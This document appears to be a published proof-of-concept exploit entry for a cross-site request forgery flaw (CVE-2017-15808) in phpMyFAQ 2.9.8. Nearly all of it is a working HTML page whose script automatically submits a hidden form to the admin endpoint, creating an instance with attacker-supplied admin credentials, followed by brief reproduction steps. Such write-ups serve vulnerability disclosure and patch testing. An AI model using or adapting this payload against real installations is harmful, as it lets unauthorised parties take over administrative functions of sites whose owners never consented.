# Exploit Title: phpMyFaq 2.9.8 - Cross Site Request Forgery (CSRF)
# Date: 2025-11-25
# Exploit Author: CodeSecLab
# Vendor Homepage: https://github.com/thorsten/phpMyFAQ/
# Software Link: https://github.com/thorsten/phpMyFAQ/
# Version: 2.9.8
# Tested on: Windows 10
# CVE : CVE-2017-15808
PoC:
<html>
<body>
<form action="http://phpmyfaq/admin/index.php" method="GET">
<input type="hidden" name="action" value="ajax">
<input type="hidden" name="ajax" value="config">
<input type="hidden" name="ajaxaction" value="add_instance">
<input type="hidden" name="url" value="malicious">
<input type="hidden" name="instance" value="malicious_instance">
<input type="hidden" name="comment" value="CSRF Test">
<input type="hidden" name="email" value="attacker@example.com">
<input type="hidden" name="admin" value="attacker">
<input type="hidden" name="password" value="password123">
<input type="submit" value="Submit request">
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
Steps to Reproduce:
1. Save the following code as poc.html.
2. Log in phpmyfaq, and open the file in the same browser.
3. The outcome will occur.